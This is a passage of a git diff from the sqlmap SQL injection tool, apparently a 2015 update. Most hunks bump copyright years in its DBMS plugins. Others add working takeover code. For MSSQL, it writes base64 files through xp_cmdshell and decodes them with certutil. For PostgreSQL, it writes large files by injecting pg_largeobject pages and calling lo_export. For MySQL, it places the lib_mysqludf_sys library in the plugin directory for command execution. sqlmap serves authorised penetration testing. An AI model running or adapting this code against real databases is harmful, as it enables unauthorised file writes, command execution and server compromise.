-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py
index 53a9728cc..9ea67eff9 100644
--- a/plugins/dbms/mssqlserver/enumeration.py
+++ b/plugins/dbms/mssqlserver/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -14,6 +14,8 @@ from lib.core.common import isNoneValue
 from lib.core.common import isNumPosStrValue
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import safeSQLIdentificatorNaming
+from lib.core.common import safeStringFormat
+from lib.core.common import unArrayizeValue
 from lib.core.common import unsafeSQLIdentificatorNaming
 from lib.core.data import conf
 from lib.core.data import kb
@@ -49,6 +51,8 @@ class Enumeration(GenericEnumeration):
             users = kb.data.cachedUsers
 
         for user in users:
+            user = unArrayizeValue(user)
+
             if user is None:
                 continue
 
@@ -102,7 +106,7 @@ class Enumeration(GenericEnumeration):
 
                 if not isNoneValue(value):
                     value = filter(None, arrayizeValue(value))
-                    value = [safeSQLIdentificatorNaming(_, True) for _ in value]
+                    value = [safeSQLIdentificatorNaming(unArrayizeValue(_), True) for _ in value]
                     kb.data.cachedTables[db] = value
 
         if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct:
@@ -133,7 +137,7 @@ class Enumeration(GenericEnumeration):
                 tables = []
 
                 for index in xrange(int(count)):
-                    _ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db) % index
+                    _ = safeStringFormat((rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db), index)
 
                     table = inject.getValue(_, union=False, error=False)
                     if not isNoneValue(table):
diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py
index 577fd923b..53e197a0d 100644
--- a/plugins/dbms/mssqlserver/filesystem.py
+++ b/plugins/dbms/mssqlserver/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -337,6 +337,32 @@ class Filesystem(GenericFilesystem):
 
         self.execCmd(complComm)
 
+    def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
+        infoMsg = "using certutil.exe to write the %s " % fileType
+        infoMsg += "file content to file '%s', please wait.." % dFile
+        logger.info(infoMsg)
+
+        chunkMaxSize = 500
+
+        randFile = "tmpf%s.txt" % randomStr(lowercase=True)
+        randFilePath = "%s\%s" % (tmpPath, randFile)
+
+        encodedFileContent = base64encode(wFileContent)
+
+        splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
+
+        logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
+
+        self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
+
+        logger.debug("decoding the file to %s.." % dFile)
+
+        commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile),
+                     "del /F /Q %s" % randFile)
+        complComm = " & ".join(command for command in commands)
+
+        self.execCmd(complComm)
+
     def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
         # NOTE: this is needed here because we use xp_cmdshell extended
         # procedure to write a file on the back-end Microsoft SQL Server
@@ -371,4 +397,13 @@ class Filesystem(GenericFilesystem):
                 self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
                 written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
 
+        if written is False:
+            message = "do you want to try to upload the file with "
+            message += "the built-in certutil.exe technique? [Y/n] "
+            choice = readInput(message, default="Y")
+
+            if not choice or choice.lower() == "y":
+                self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType)
+                written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
+
         return written
diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py
index 90fffb160..8483b6429 100644
--- a/plugins/dbms/mssqlserver/fingerprint.py
+++ b/plugins/dbms/mssqlserver/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -66,7 +66,7 @@ class Fingerprint(GenericFingerprint):
 
     def checkDbms(self):
         if not conf.extensiveFp and (Backend.isDbmsWithin(MSSQL_ALIASES) \
-           or conf.dbms in MSSQL_ALIASES) and Backend.getVersion() and \
+           or (conf.dbms or "").lower() in MSSQL_ALIASES) and Backend.getVersion() and \
            Backend.getVersion().isdigit():
             setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
 
diff --git a/plugins/dbms/mssqlserver/syntax.py b/plugins/dbms/mssqlserver/syntax.py
index 7918613a4..314ba5c8d 100644
--- a/plugins/dbms/mssqlserver/syntax.py
+++ b/plugins/dbms/mssqlserver/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py
index 2f3df49f1..e387d4095 100644
--- a/plugins/dbms/mssqlserver/takeover.py
+++ b/plugins/dbms/mssqlserver/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py
index fdf2ef1ea..7baec6ce9 100644
--- a/plugins/dbms/mysql/__init__.py
+++ b/plugins/dbms/mysql/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py
index 657b8af5a..62e073425 100644
--- a/plugins/dbms/mysql/connector.py
+++ b/plugins/dbms/mysql/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mysql/enumeration.py b/plugins/dbms/mysql/enumeration.py
index f8044a604..6480d9c7b 100644
--- a/plugins/dbms/mysql/enumeration.py
+++ b/plugins/dbms/mysql/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py
index 4944a9c5e..1bfd8f621 100644
--- a/plugins/dbms/mysql/filesystem.py
+++ b/plugins/dbms/mysql/filesystem.py
@@ -1,12 +1,14 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 from lib.core.common import isNumPosStrValue
 from lib.core.common import isTechniqueAvailable
+from lib.core.common import popValue
+from lib.core.common import pushValue
 from lib.core.common import randomStr
 from lib.core.common import singleTimeWarnMessage
 from lib.core.data import conf
@@ -97,8 +99,11 @@ class Filesystem(GenericFilesystem):
         debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
         logger.debug(debugMsg)
 
+        pushValue(kb.forceWhere)
+        kb.forceWhere = PAYLOAD.WHERE.NEGATIVE
         sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile)
         unionUse(sqlQuery, unpack=False)
+        kb.forceWhere = popValue()
 
         warnMsg = "expect junk characters inside the "
         warnMsg += "file as a leftover from UNION query"
diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py
index 6343ada1f..700badb4f 100644
--- a/plugins/dbms/mysql/fingerprint.py
+++ b/plugins/dbms/mysql/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -143,7 +143,7 @@ class Fingerprint(GenericFingerprint):
         """
 
         if not conf.extensiveFp and (Backend.isDbmsWithin(MYSQL_ALIASES) \
-           or conf.dbms in MYSQL_ALIASES) and Backend.getVersion() and \
+           or (conf.dbms or "").lower() in MYSQL_ALIASES) and Backend.getVersion() and \
            Backend.getVersion() != UNKNOWN_DBMS_VERSION:
             v = Backend.getVersion().replace(">", "")
             v = v.replace("=", "")
diff --git a/plugins/dbms/mysql/syntax.py b/plugins/dbms/mysql/syntax.py
index 6dfe3bb58..e593a51fb 100644
--- a/plugins/dbms/mysql/syntax.py
+++ b/plugins/dbms/mysql/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py
index e6e79e3db..8d132fb60 100644
--- a/plugins/dbms/mysql/takeover.py
+++ b/plugins/dbms/mysql/takeover.py
@@ -1,14 +1,16 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import os
 import re
 
 from lib.core.agent import agent
 from lib.core.common import Backend
+from lib.core.common import decloakToTemp
 from lib.core.common import isStackingAvailable
 from lib.core.common import normalizePath
 from lib.core.common import ntToPosixSlashes
@@ -26,6 +28,7 @@ class Takeover(GenericTakeover):
     def __init__(self):
         self.__basedir = None
         self.__datadir = None
+        self.__plugindir = None
 
         GenericTakeover.__init__(self)
 
@@ -34,9 +37,13 @@ class Takeover(GenericTakeover):
 
         banVer = kb.bannerFp["dbmsVersion"]
 
-        # On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0
-        if banVer >= "5.1.19":
-            if self.__basedir is None:
+        if banVer >= "5.0.67":
+            if self.__plugindir is None:
+                logger.info("retrieving MySQL plugin directory absolute path")
+                self.__plugindir = unArrayizeValue(inject.getValue("SELECT @@plugin_dir"))
+
+            # On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0
+            if self.__plugindir is None and banVer >= "5.1.19":
                 logger.info("retrieving MySQL base directory absolute path")
 
                 # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_basedir
@@ -47,14 +54,15 @@ class Takeover(GenericTakeover):
                 else:
                     Backend.setOs(OS.LINUX)
 
-            # The DLL must be in C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin
-            if Backend.isOs(OS.WINDOWS):
-                self.__basedir += "/lib/plugin"
-            else:
-                self.__basedir += "/lib/mysql/plugin"
+                # The DLL must be in C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin
+                if Backend.isOs(OS.WINDOWS):
+                    self.__plugindir = "%s/lib/plugin" % self.__basedir
+                else:
+                    self.__plugindir = "%s/lib/mysql/plugin" % self.__basedir
 
-            self.__basedir = ntToPosixSlashes(normalizePath(self.__basedir))
-            self.udfRemoteFile = "%s/%s.%s" % (self.__basedir, self.udfSharedLibName, self.udfSharedLibExt)
+                self.__plugindir = ntToPosixSlashes(normalizePath(self.__plugindir))
+
+            self.udfRemoteFile = "%s/%s.%s" % (self.__plugindir, self.udfSharedLibName, self.udfSharedLibExt)
 
         # On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
         # On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
@@ -78,10 +86,12 @@ class Takeover(GenericTakeover):
         self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
 
         if Backend.isOs(OS.WINDOWS):
-            self.udfLocalFile += "/mysql/windows/%d/lib_mysqludf_sys.dll" % Backend.getArch()
+            _ = os.path.join(self.udfLocalFile, "mysql", "windows", "%d" % Backend.getArch(), "lib_mysqludf_sys.dll_")
+            self.udfLocalFile = decloakToTemp(_)
             self.udfSharedLibExt = "dll"
         else:
-            self.udfLocalFile += "/mysql/linux/%d/lib_mysqludf_sys.so" % Backend.getArch()
+            _ = os.path.join(self.udfLocalFile, "mysql", "linux", "%d" % Backend.getArch(), "lib_mysqludf_sys.so_")
+            self.udfLocalFile = decloakToTemp(_)
             self.udfSharedLibExt = "so"
 
     def udfCreateFromSharedLib(self, udf, inpRet):
diff --git a/plugins/dbms/oracle/__init__.py b/plugins/dbms/oracle/__init__.py
index 5bd61bc79..165f92702 100644
--- a/plugins/dbms/oracle/__init__.py
+++ b/plugins/dbms/oracle/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py
index 6d73fe55d..3777689f4 100644
--- a/plugins/dbms/oracle/connector.py
+++ b/plugins/dbms/oracle/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py
index 2db7befff..b9318d17f 100644
--- a/plugins/dbms/oracle/enumeration.py
+++ b/plugins/dbms/oracle/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/oracle/filesystem.py b/plugins/dbms/oracle/filesystem.py
index d36bd7187..0428e3fdb 100644
--- a/plugins/dbms/oracle/filesystem.py
+++ b/plugins/dbms/oracle/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py
index fd7e4c452..4b56b3122 100644
--- a/plugins/dbms/oracle/fingerprint.py
+++ b/plugins/dbms/oracle/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -58,7 +58,7 @@ class Fingerprint(GenericFingerprint):
         return value
 
     def checkDbms(self):
-        if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or conf.dbms in ORACLE_ALIASES):
+        if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or (conf.dbms or "").lower() in ORACLE_ALIASES):
             setDbms(DBMS.ORACLE)
 
             self.getBanner()
diff --git a/plugins/dbms/oracle/syntax.py b/plugins/dbms/oracle/syntax.py
index c751350c3..41d2e9df5 100644
--- a/plugins/dbms/oracle/syntax.py
+++ b/plugins/dbms/oracle/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/oracle/takeover.py b/plugins/dbms/oracle/takeover.py
index e8102a43d..1781cd9e0 100644
--- a/plugins/dbms/oracle/takeover.py
+++ b/plugins/dbms/oracle/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py
index 1972cff2f..561b13572 100644
--- a/plugins/dbms/postgresql/__init__.py
+++ b/plugins/dbms/postgresql/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/postgresql/connector.py b/plugins/dbms/postgresql/connector.py
index 2789dafa1..e60e7777a 100644
--- a/plugins/dbms/postgresql/connector.py
+++ b/plugins/dbms/postgresql/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/postgresql/enumeration.py b/plugins/dbms/postgresql/enumeration.py
index bcac4ccc8..d379c2512 100644
--- a/plugins/dbms/postgresql/enumeration.py
+++ b/plugins/dbms/postgresql/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py
index f0ea52c42..72cf7c75f 100644
--- a/plugins/dbms/postgresql/filesystem.py
+++ b/plugins/dbms/postgresql/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -11,12 +11,14 @@ from lib.core.common import randomInt
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import SqlmapUnsupportedFeatureException
+from lib.core.settings import LOBLKSIZE
 from lib.request import inject
 from plugins.generic.filesystem import Filesystem as GenericFilesystem
 
 class Filesystem(GenericFilesystem):
     def __init__(self):
         self.oid = None
+        self.page = None
 
         GenericFilesystem.__init__(self)
 
@@ -35,34 +37,13 @@ class Filesystem(GenericFilesystem):
 
     def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
         wFileSize = os.path.getsize(wFile)
-
-        if wFileSize > 8192:
-            errMsg = "on PostgreSQL it is not possible to write files "
-            errMsg += "bigger than 8192 bytes at the moment"
-            raise SqlmapUnsupportedFeatureException(errMsg)
+        content = open(wFile, "rb").read()
 
         self.oid = randomInt()
-
-        debugMsg = "creating a support table to write the base64 "
-        debugMsg += "encoded file to"
-        logger.debug(debugMsg)
+        self.page = 0
 
         self.createSupportTbl(self.fileTblName, self.tblField, "text")
 
-        logger.debug("encoding file to its base64 string value")
-        fcEncodedList = self.fileEncode(wFile, "base64", False)
-
-        debugMsg = "forging SQL statements to write the base64 "
-        debugMsg += "encoded file to the support table"
-        logger.debug(debugMsg)
-
-        sqlQueries = self.fileToSqlQueries(fcEncodedList)
-
-        logger.debug("inserting the base64 encoded file to the support table")
-
-        for sqlQuery in sqlQueries:
-            inject.goStacked(sqlQuery)
-
         debugMsg = "create a new OID for a large object, it implicitly "
         debugMsg += "adds an entry in the large objects system table"
         logger.debug(debugMsg)
@@ -70,44 +51,27 @@ class Filesystem(GenericFilesystem):
         # References:
         # http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
         # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
+
         inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
         inject.goStacked("SELECT lo_create(%d)" % self.oid)
+        inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid)
 
-        debugMsg = "updating the system large objects table assigning to "
-        debugMsg += "the just created OID the binary (base64 decoded) UDF "
-        debugMsg += "as data"
-        logger.debug(debugMsg)
+        for offset in xrange(0, wFileSize, LOBLKSIZE):
+            fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False)
+            sqlQueries = self.fileToSqlQueries(fcEncodedList)
 
-        # Refereces:
-        # * http://www.postgresql.org/docs/8.3/interactive/catalog-pg-largeobject.html
-        # * http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
-        #
-        # NOTE: From PostgreSQL site:
-        #
-        #   "The data stored in the large object will never be more than
-        #   LOBLKSIZE bytes and might be less which is BLCKSZ/4, or
-        #   typically 2 Kb"
-        #
-        # As a matter of facts it was possible to store correctly a file
-        # large 13776 bytes, the problem arises at next step (lo_export())
-        #
-        # Inject manually into PostgreSQL system table pg_largeobject the
-        # base64-decoded file content. Note that PostgreSQL >= 9.0 does
-        # not accept UPDATE into that table for some reason.
-        self.getVersionFromBanner()
-        banVer = kb.bannerFp["dbmsVersion"]
+            for sqlQuery in sqlQueries:
+                inject.goStacked(sqlQuery)
 
-        if banVer >= "9.0":
-            inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, 0, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.tblField, self.fileTblName))
-        else:
-            inject.goStacked("UPDATE pg_largeobject SET data=(DECODE((SELECT %s FROM %s), 'base64')) WHERE loid=%d" % (self.tblField, self.fileTblName, self.oid))
+            inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName))
+            inject.goStacked("DELETE FROM %s" % self.fileTblName)
+
+            self.page += 1
 
         debugMsg = "exporting the OID %s file content to " % fileType
         debugMsg += "file '%s'" % dFile
         logger.debug(debugMsg)
 
-        # NOTE: lo_export() exports up to only 8192 bytes of the file
-        # (pg_largeobject 'data' field)
         inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, dFile), silent=True)
 
         written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py
index 0ae590382..3391f711e 100644
--- a/plugins/dbms/postgresql/fingerprint.py
+++ b/plugins/dbms/postgresql/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -63,7 +63,7 @@ class Fingerprint(GenericFingerprint):
         * http://www.postgresql.org/docs/9.1/interactive/release.html (up to 9.1.3)
         """
 
-        if not conf.extensiveFp and (Backend.isDbmsWithin(PGSQL_ALIASES) or conf.dbms in PGSQL_ALIASES):
+        if not conf.extensiveFp and (Backend.isDbmsWithin(PGSQL_ALIASES) or (conf.dbms or "").lower() in PGSQL_ALIASES):
             setDbms(DBMS.PGSQL)
 
             self.getBanner()
diff --git a/plugins/dbms/postgresql/syntax.py b/plugins/dbms/postgresql/syntax.py
index 2fd8edebc..7bb904625 100644
--- a/plugins/dbms/postgresql/syntax.py
+++ b/plugins/dbms/postgresql/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py
index b310c43cd..0e4794acd 100644
--- a/plugins/dbms/postgresql/takeover.py
+++ b/plugins/dbms/postgresql/takeover.py
@@ -1,16 +1,21 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import os
+
 from lib.core.common import Backend
+from lib.core.common import checkFile
+from lib.core.common import decloakToTemp
 from lib.core.common import randomStr
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.enums import OS
+from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapUnsupportedFeatureException
 from lib.request import inject
 from plugins.generic.takeover import Takeover as GenericTakeover
@@ -57,12 +62,20 @@ class Takeover(GenericTakeover):
             errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
             raise SqlmapUnsupportedFeatureException(errMsg)
 
-        if Backend.isOs(OS.WINDOWS):
-            self.udfLocalFile += "/postgresql/windows/%d/%s/lib_postgresqludf_sys.dll" % (Backend.getArch(), majorVer)
-            self.udfSharedLibExt = "dll"
-        else:
-            self.udfLocalFile += "/postgresql/linux/%d/%s/lib_postgresqludf_sys.so" % (Backend.getArch(), majorVer)
-            self.udfSharedLibExt = "so"
+        try:
+            if Backend.isOs(OS.WINDOWS):
+                _ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_")
+                checkFile(_)
+                self.udfLocalFile = decloakToTemp(_)
+                self.udfSharedLibExt = "dll"
+            else:
+                _ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_")
+                checkFile(_)
+                self.udfLocalFile = decloakToTemp(_)
+                self.udfSharedLibExt = "so"
+        except SqlmapSystemException:
+            errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (majorVer, Backend.getArch())
+            raise SqlmapUnsupportedFeatureException(errMsg)
 
     def udfCreateFromSharedLib(self, udf, inpRet):
         if udf in self.udfToCreate:
diff --git a/plugins/dbms/sqlite/__init__.py b/plugins/dbms/sqlite/__init__.py
index 047b547ca..0f7dcab83 100644
--- a/plugins/dbms/sqlite/__init__.py
+++ b/plugins/dbms/sqlite/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py
index dfe9dcf4a..dae2a3e78 100644
--- a/plugins/dbms/sqlite/connector.py
+++ b/plugins/dbms/sqlite/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sqlite/enumeration.py b/plugins/dbms/sqlite/enumeration.py
index e0b07881a..db1d3c954 100644
--- a/plugins/dbms/sqlite/enumeration.py
+++ b/plugins/dbms/sqlite/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sqlite/filesystem.py b/plugins/dbms/sqlite/filesystem.py
index 8a0416dd5..ed1e5c152 100644
--- a/plugins/dbms/sqlite/filesystem.py
+++ b/plugins/dbms/sqlite/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py
index dd1b7e56b..6c42a6374 100644
--- a/plugins/dbms/sqlite/fingerprint.py
+++ b/plugins/dbms/sqlite/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
